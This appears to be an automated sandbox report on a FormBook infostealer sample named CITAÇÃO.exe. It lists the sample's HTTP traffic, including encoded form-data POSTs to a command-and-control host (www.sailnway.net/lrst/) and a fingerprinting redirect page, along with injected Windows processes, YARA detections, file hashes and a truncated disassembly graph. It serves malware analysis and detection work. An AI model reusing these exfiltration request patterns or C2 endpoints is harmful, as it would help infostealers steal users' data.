                                                    36192.168.2.449777103.224.182.242801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:26:30.266987085 CEST546OUTGET /pp43/?y0qt3F=/yzCblrJsERuqgz3jJaeg3gXWqInWNIu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVu5vGFEpVLHigJkCccCfv+m7blBfZ8lkEAhE=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.nobartv6.website
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:26:30.854708910 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 26 Sep 2024 07:26:30 GMT
                                                    server: Apache
                                                    set-cookie: __tad=1727335590.5212206; expires=Sun, 24-Sep-2034 07:26:30 GMT; Max-Age=315360000
                                                    vary: Accept-Encoding
                                                    content-length: 1487
                                                    content-type: text/html; charset=UTF-8
                                                    connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 2f 70 70 34 33 2f 3f 79 30 71 74 33 46 3d 2f 79 7a 43 62 6c 72 4a 73 45 52 75 71 67 7a 33 6a 4a 61 65 67 33 67 58 57 71 49 6e 57 4e 49 75 2b 36 5a 68 38 2f 38 59 71 42 30 31 46 75 4f 2b 44 4c 58 66 67 63 6c 76 48 6e 74 33 43 57 4e 75 47 6c 6c 58 74 70 30 38 47 6e 4c 51 4b 4a 32 69 43 74 6a 56 75 35 76 47 46 45 70 56 4c 48 69 67 4a 6b 43 63 63 43 66 76 2b 6d 37 62 6c 42 66 5a 38 6c 6b 45 41 68 45 3d 26 6b 5a [TRUNCATED]
                                                    Data Ascii: <html><head><title>nobartv6.website</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.nobartv6.website/pp43/?y0qt3F=/yzCblrJsERuqgz3jJaeg3gXWqInWNIu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVu5vGFEpVLHigJkCccCfv+m7blBfZ8lkEAhE=&kZ=E8WpI&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffff
                                                    Sep 26, 2024 09:26:30.854734898 CEST523INData Raw: 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69
                                                    Data Ascii: ff" text="#000000"><div style='display: none;'><a href='http://www.nobartv6.website/pp43/?y0qt3F=/yzCblrJsERuqgz3jJaeg3gXWqInWNIu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVu5vGFEpVLHigJkCccCfv+m7blBfZ8lkEAhE=&kZ=E8WpI&fp=-3'>Click he


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    37192.168.2.44977885.159.66.93801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:26:35.999768972 CEST810OUTPOST /lrst/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.sailnway.net
                                                    Origin: http://www.sailnway.net
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.sailnway.net/lrst/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 52 75 6b 69 33 74 64 73 37 58 65 4f 73 54 68 56 62 32 63 63 74 6c 62 55 46 31 56 42 66 66 4e 56 43 46 56 6d 50 70 79 65 35 33 42 4d 4b 66 33 4b 45 47 47 35 74 76 72 6b 6f 76 70 44 74 49 35 6e 6c 78 4b 51 70 4e 53 37 52 47 4c 77 4e 67 75 5a 50 38 39 6a 35 31 52 73 6a 65 72 66 51 51 49 42 33 67 56 63 66 44 62 31 33 63 4d 53 77 50 51 56 54 55 30 76 36 4a 35 2b 4a 31 78 69 5a 6f 39 65 4a 4e 64 50 2b 74 45 4c 51 69 44 4d 69 4d 48 71 31 43 50 57 6f 45 35 2f 4d 56 4c 36 4e 2f 76 2f 68 51 37 59 2b 5a 73 45 33 4a 2f 38 34 69 2f 77 4f 70 35 4c 4a 67 3d 3d
                                                    Data Ascii: y0qt3F=rBDGnmFpclO/Ruki3tds7XeOsThVb2cctlbUF1VBffNVCFVmPpye53BMKf3KEGG5tvrkovpDtI5nlxKQpNS7RGLwNguZP89j51RsjerfQQIB3gVcfDb13cMSwPQVTU0v6J5+J1xiZo9eJNdP+tELQiDMiMHq1CPWoE5/MVL6N/v/hQ7Y+ZsE3J/84i/wOp5LJg==


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    38192.168.2.44977985.159.66.93801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:26:38.548629045 CEST830OUTPOST /lrst/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.sailnway.net
                                                    Origin: http://www.sailnway.net
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.sailnway.net/lrst/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 44 65 30 69 34 75 31 73 73 48 66 38 6a 7a 68 56 41 6d 63 51 74 6c 6e 55 46 77 35 52 65 74 35 56 43 6e 4e 6d 4f 6f 79 65 30 58 42 4d 41 2f 33 31 61 32 47 69 74 76 75 62 6f 75 56 44 74 49 39 6e 6c 78 61 51 6f 36 2b 30 51 57 4c 79 4c 67 75 66 4c 38 39 6a 35 31 52 73 6a 65 75 58 51 51 77 42 33 52 46 63 65 68 7a 71 35 38 4d 64 67 66 51 56 58 55 30 72 36 4a 35 51 4a 77 56 49 5a 72 46 65 4a 4d 74 50 2f 38 45 4d 48 53 44 4b 6d 4d 47 70 6b 42 32 68 6d 47 6f 51 4e 58 61 62 4c 4e 7a 74 74 32 71 43 76 6f 4e 54 6c 4a 62 50 6c 6c 32 45 44 71 45 43 53 70 57 64 61 4f 48 41 41 72 41 39 5a 51 4b 57 53 61 64 30 41 6f 30 3d
                                                    Data Ascii: y0qt3F=rBDGnmFpclO/De0i4u1ssHf8jzhVAmcQtlnUFw5Ret5VCnNmOoye0XBMA/31a2GitvubouVDtI9nlxaQo6+0QWLyLgufL89j51RsjeuXQQwB3RFcehzq58MdgfQVXU0r6J5QJwVIZrFeJMtP/8EMHSDKmMGpkB2hmGoQNXabLNztt2qCvoNTlJbPll2EDqECSpWdaOHAArA9ZQKWSad0Ao0=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    39192.168.2.44978085.159.66.93801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:26:41.102494955 CEST10912OUTPOST /lrst/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.sailnway.net
                                                    Origin: http://www.sailnway.net
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.sailnway.net/lrst/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 44 65 30 69 34 75 31 73 73 48 66 38 6a 7a 68 56 41 6d 63 51 74 6c 6e 55 46 77 35 52 65 74 42 56 43 30 46 6d 4f 4c 61 65 31 58 42 4d 65 76 33 30 61 32 47 76 74 72 44 53 6f 75 5a 54 74 4e 68 6e 6e 53 43 51 76 49 47 30 65 6d 4c 79 47 41 75 65 50 38 39 71 35 31 42 67 6a 65 65 58 51 51 77 42 33 53 74 63 62 44 62 71 70 4d 4d 53 77 50 51 5a 54 55 31 4f 36 4a 78 6d 4a 78 56 79 65 62 6c 65 51 73 39 50 79 75 38 4d 46 79 44 49 71 73 47 4c 6b 41 4b 2b 6d 47 6b 32 4e 57 66 4f 4c 50 76 74 75 68 47 56 38 49 4a 38 37 6f 44 32 2b 6d 57 66 43 49 4d 76 65 75 62 70 4b 65 37 33 62 59 51 43 44 6a 62 68 46 72 56 6f 44 74 75 4c 6e 2f 70 7a 39 36 5a 57 6c 30 6e 2f 30 6c 46 75 33 44 5a 51 6c 77 33 43 4c 38 32 64 54 65 78 74 50 48 58 31 6c 6d 33 66 6e 75 6f 72 78 31 52 2b 64 36 4e 6e 42 6e 71 6f 2b 6a 56 43 52 69 53 6a 44 6e 56 33 35 6f 61 6c 47 49 58 4f 6b 4b 76 52 73 36 79 30 78 73 62 65 30 35 56 38 2f 72 57 66 32 73 56 41 63 7a 4b 55 51 45 75 54 74 53 36 6e 58 56 32 [TRUNCATED]
                                                    Data Ascii: y0qt3F=rBDGnmFpclO/De0i4u1ssHf8jzhVAmcQtlnUFw5RetBVC0FmOLae1XBMev30a2GvtrDSouZTtNhnnSCQvIG0emLyGAueP89q51BgjeeXQQwB3StcbDbqpMMSwPQZTU1O6JxmJxVyebleQs9Pyu8MFyDIqsGLkAK+mGk2NWfOLPvtuhGV8IJ87oD2+mWfCIMveubpKe73bYQCDjbhFrVoDtuLn/pz96ZWl0n/0lFu3DZQlw3CL82dTextPHX1lm3fnuorx1R+d6NnBnqo+jVCRiSjDnV35oalGIXOkKvRs6y0xsbe05V8/rWf2sVAczKUQEuTtS6nXV2OmodCPiEAIjrSDt9WDQbg23OL+fCIySnOi3Ow8yIZXE4j9DmYqI+YW/QymwxByOJ8tm6J94KmCQQMiwfR4c9xRAL2AWg9GhJ78HN1cDkVjc7IOSxEw24GYcMNSPjfbNGj0niurHqvOgjJw6OMXH/+pW1XSrdR/otoSO5yUYWz6gEMPGSurFE3S8MoHaH0WnP2vU9U2I7S2yYL4fspnTpn/KGCusAbJO7AM27rB2JGdUDvn0t7rMSyydIyVQ6rXF0NAXh79rMVXL6g7jsQ6w8umPFuGv3lPF7PVc0DXfVON23Vfj1KSuoh7W39uDVqbzAFznUyfmRTHJgEcC7wmgm/na+mc2dfx08nRaD1lxHq6pFNq7RsPMfMfou7dEZhf/HacduW1/6EbGGrwg++VBqmp2vesvizXOM/R2igRN6Pr7n+bqSBzE38m9F/iA4agiDjFnpUk27shQ97F7xB21b6yYKlYid5AgT9PSBD5VJ0fQXPGy7XuMoDY2JJ1sJbChIugPwhM/EVEiyPkQ1xceZPKX5vPBgfp7sgo9pUhGE+HVnZhM/pbqqS0MbG9M9yJ7MA6xrNya12Ol1rCj2eMSF/FsLC7wJ2HXYuk80Ix/9UUaRbWvAfu7fZomd5veY55JtxF3hVxLNPORQSj+2DLZQ3GbYV0RMpsq136 [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    40192.168.2.44978185.159.66.93801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:26:43.640921116 CEST542OUTGET /lrst/?y0qt3F=mDrmkSN/AS2kB6lxw+ox9UfR9hI3CHIhmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KclyEBWGGMepgvGhsxtLzd1Vd+SluWBGSo6Y=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.sailnway.net
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:03:23:00
                                                    Start date:26/09/2024
                                                    Path:C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe"
                                                    Imagebase:0x400000
                                                    File size:1'353'653 bytes
                                                    MD5 hash:05643E059A165F8B6B3B3E4BD0D9F226
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:1
                                                    Start time:03:23:08
                                                    Start date:26/09/2024
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe"
                                                    Imagebase:0xf0000
                                                    File size:46'504 bytes
                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:03:23:22
                                                    Start date:26/09/2024
                                                    Path:C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe"
                                                    Imagebase:0x7e0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:6
                                                    Start time:03:23:26
                                                    Start date:26/09/2024
                                                    Path:C:\Windows\SysWOW64\netbtugc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                    Imagebase:0x1e0000
                                                    File size:22'016 bytes
                                                    MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:7
                                                    Start time:03:23:38
                                                    Start date:26/09/2024
                                                    Path:C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe"
                                                    Imagebase:0x7e0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:8
                                                    Start time:03:24:00
                                                    Start date:26/09/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff6bf500000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:3.7%
                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                      Signature Coverage:9.6%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:34
                                                      execution_graph 84299 4010e0 84302 401100 84299->84302 84301 4010f8 84303 401113 84302->84303 84305 401120 84303->84305 84306 401184 84303->84306 84307 40114c 84303->84307 84333 401182 84303->84333 84304 40112c DefWindowProcW 84304->84301 84305->84304 84361 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 84305->84361 84340 401250 84306->84340 84309 401151 84307->84309 84310 40119d 84307->84310 84314 401219 84309->84314 84315 40115d 84309->84315 84312 4011a3 84310->84312 84313 42afb4 84310->84313 84311 401193 84311->84301 84312->84305 84323 4011b6 KillTimer 84312->84323 84324 4011db SetTimer RegisterWindowMessageW 84312->84324 84356 40f190 10 API calls 84313->84356 84314->84305 84316 401225 84314->84316 84319 401163 84315->84319 84325 42b01d 84315->84325 84372 468b0e 74 API calls __crtGetStringTypeA_stat 84316->84372 84320 42afe9 84319->84320 84321 40116c 84319->84321 84358 40f190 10 API calls 84320->84358 84321->84305 84326 401174 84321->84326 84322 42b04f 84362 40e0c0 84322->84362 84355 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 84323->84355 84324->84311 84331 401204 CreatePopupMenu 84324->84331 84325->84304 84360 4370f4 52 API calls 84325->84360 84357 45fd57 65 API calls __crtGetStringTypeA_stat 84326->84357 84331->84301 84333->84304 84334 42afe4 84334->84311 84335 42b00e 84359 401a50 330 API calls 84335->84359 84336 4011c9 PostQuitMessage 84336->84301 84339 42afdc 84339->84304 84339->84334 84341 401262 __crtGetStringTypeA_stat 84340->84341 84342 4012e8 84340->84342 84373 401b80 84341->84373 84342->84311 84344 40128c 84345 4012d1 KillTimer SetTimer 84344->84345 84346 4012bb 84344->84346 84347 4272ec 84344->84347 84345->84342 84348 4012c5 84346->84348 84349 42733f 84346->84349 84350 4272f4 Shell_NotifyIconW 84347->84350 84351 42731a Shell_NotifyIconW 84347->84351 84348->84345 84352 427393 Shell_NotifyIconW 84348->84352 84353 427348 Shell_NotifyIconW 84349->84353 84354 42736e Shell_NotifyIconW 84349->84354 84350->84345 84351->84345 84352->84345 84353->84345 84354->84345 84355->84336 84356->84311 84357->84339 84358->84335 84359->84333 84360->84333 84361->84322 84364 40e0e7 __crtGetStringTypeA_stat 84362->84364 84363 40e142 84369 40e184 84363->84369 84471 4341e6 63 API calls __wcsicoll 84363->84471 84364->84363 84365 42729f DestroyIcon 84364->84365 84365->84363 84367 40e1a0 Shell_NotifyIconW 84370 401b80 54 API calls 84367->84370 84368 4272db Shell_NotifyIconW 84369->84367 84369->84368 84371 40e1ba 84370->84371 84371->84333 84372->84334 84374 401b9c 84373->84374 84375 401c7e 84373->84375 84395 4013c0 84374->84395 84375->84344 84378 42722b LoadStringW 84381 427246 84378->84381 84379 401bb9 84400 402160 84379->84400 84414 40e0a0 84381->84414 84382 401bcd 84384 427258 84382->84384 84385 401bda 84382->84385 84418 40d200 52 API calls 2 library calls 84384->84418 84385->84381 84386 401be4 84385->84386 84413 40d200 52 API calls 2 library calls 84386->84413 84389 427267 84390 42727b 84389->84390 84392 401bf3 _wcscpy __crtGetStringTypeA_stat _wcsncpy 84389->84392 84419 40d200 52 API calls 2 library calls 84390->84419 84393 401c62 Shell_NotifyIconW 84392->84393 84393->84375 84394 427289 84420 4115d7 84395->84420 84401 426daa 84400->84401 84402 40216b _wcslen 84400->84402 84458 40c600 84401->84458 84405 402180 84402->84405 84406 40219e 84402->84406 84404 426db5 84404->84382 84457 403bd0 52 API calls moneypunct 84405->84457 84407 4013a0 52 API calls 84406->84407 84409 4021a5 84407->84409 84410 426db7 84409->84410 84411 4115d7 52 API calls 84409->84411 84412 402187 _memmove 84411->84412 84412->84382 84413->84392 84415 40e0b2 84414->84415 84416 40e0a8 84414->84416 84415->84392 84470 403c30 52 API calls _memmove 84416->84470 84418->84389 84419->84394 84423 4115e1 _malloc 84420->84423 84422 4013e4 84431 4013a0 84422->84431 84423->84422 84426 4115fd std::exception::exception 84423->84426 84434 4135bb 84423->84434 84424 41163b 84449 4180af 46 API calls std::exception::operator= 84424->84449 84426->84424 84448 41130a 51 API calls __cinit 84426->84448 84427 411645 84450 418105 RaiseException 84427->84450 84430 411656 84432 4115d7 52 API calls 84431->84432 84433 4013a7 84432->84433 84433->84378 84433->84379 84435 413638 _malloc 84434->84435 84445 4135c9 _malloc 84434->84445 84456 417f77 46 API calls __getptd_noexit 84435->84456 84436 4135d4 84436->84445 84451 418901 46 API calls 2 library calls 84436->84451 84452 418752 46 API calls 9 library calls 84436->84452 84453 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84436->84453 84439 4135f7 RtlAllocateHeap 84440 413630 84439->84440 84439->84445 84440->84423 84442 413624 84454 417f77 46 API calls __getptd_noexit 84442->84454 84445->84436 84445->84439 84445->84442 84446 413622 84445->84446 84455 417f77 46 API calls __getptd_noexit 84446->84455 84448->84424 84449->84427 84450->84430 84451->84436 84452->84436 84454->84446 84455->84440 84456->84440 84457->84412 84459 40c619 84458->84459 84460 40c60a 84458->84460 84459->84404 84460->84459 84463 4026f0 84460->84463 84462 426d7a _memmove 84462->84404 84464 426873 84463->84464 84465 4026ff 84463->84465 84466 4013a0 52 API calls 84464->84466 84465->84462 84467 42687b 84466->84467 84468 4115d7 52 API calls 84467->84468 84469 42689e _memmove 84468->84469 84469->84462 84470->84415 84471->84369 84472 40bd20 84473 428194 84472->84473 84481 40bd2d 84472->84481 84474 40bd43 84473->84474 84475 4281bc 84473->84475 84477 4281b2 84473->84477 84494 45e987 86 API calls moneypunct 84475->84494 84493 40b510 VariantClear 84477->84493 84482 40bd37 84481->84482 84495 4531b1 85 API calls 5 library calls 84481->84495 84484 40bd50 84482->84484 84483 4281ba 84485 426cf1 84484->84485 84486 40bd63 84484->84486 84505 44cde9 52 API calls _memmove 84485->84505 84496 40bd80 84486->84496 84489 40bd73 84489->84474 84490 426cfc 84491 40e0a0 52 API calls 84490->84491 84492 426d02 84491->84492 84493->84483 84494->84481 84495->84482 84497 40bd8e 84496->84497 84498 40bdb7 _memmove 84496->84498 84497->84498 84499 40bded 84497->84499 84500 40bdad 84497->84500 84498->84489 84502 4115d7 52 API calls 84499->84502 84506 402f00 84500->84506 84503 40bdf6 84502->84503 84503->84498 84504 4115d7 52 API calls 84503->84504 84504->84498 84505->84490 84507 402f10 84506->84507 84508 402f0c 84506->84508 84509 4115d7 52 API calls 84507->84509 84510 4268c3 84507->84510 84508->84498 84511 402f51 moneypunct _memmove 84509->84511 84511->84498 84512 425ba2 84517 40e360 84512->84517 84514 425bb4 84533 41130a 51 API calls __cinit 84514->84533 84516 425bbe 84518 4115d7 52 API calls 84517->84518 84519 40e3ec GetModuleFileNameW 84518->84519 84534 413a0e 84519->84534 84521 40e421 _wcsncat 84537 413a9e 84521->84537 84524 4115d7 52 API calls 84525 40e45e _wcscpy 84524->84525 84540 40bc70 84525->84540 84529 40e4a9 84529->84514 84530 401c90 52 API calls 84531 40e4a1 _wcscat _wcslen _wcsncpy 84530->84531 84531->84529 84531->84530 84532 4115d7 52 API calls 84531->84532 84532->84531 84533->84516 84559 413801 84534->84559 84589 419efd 84537->84589 84541 4115d7 52 API calls 84540->84541 84542 40bc98 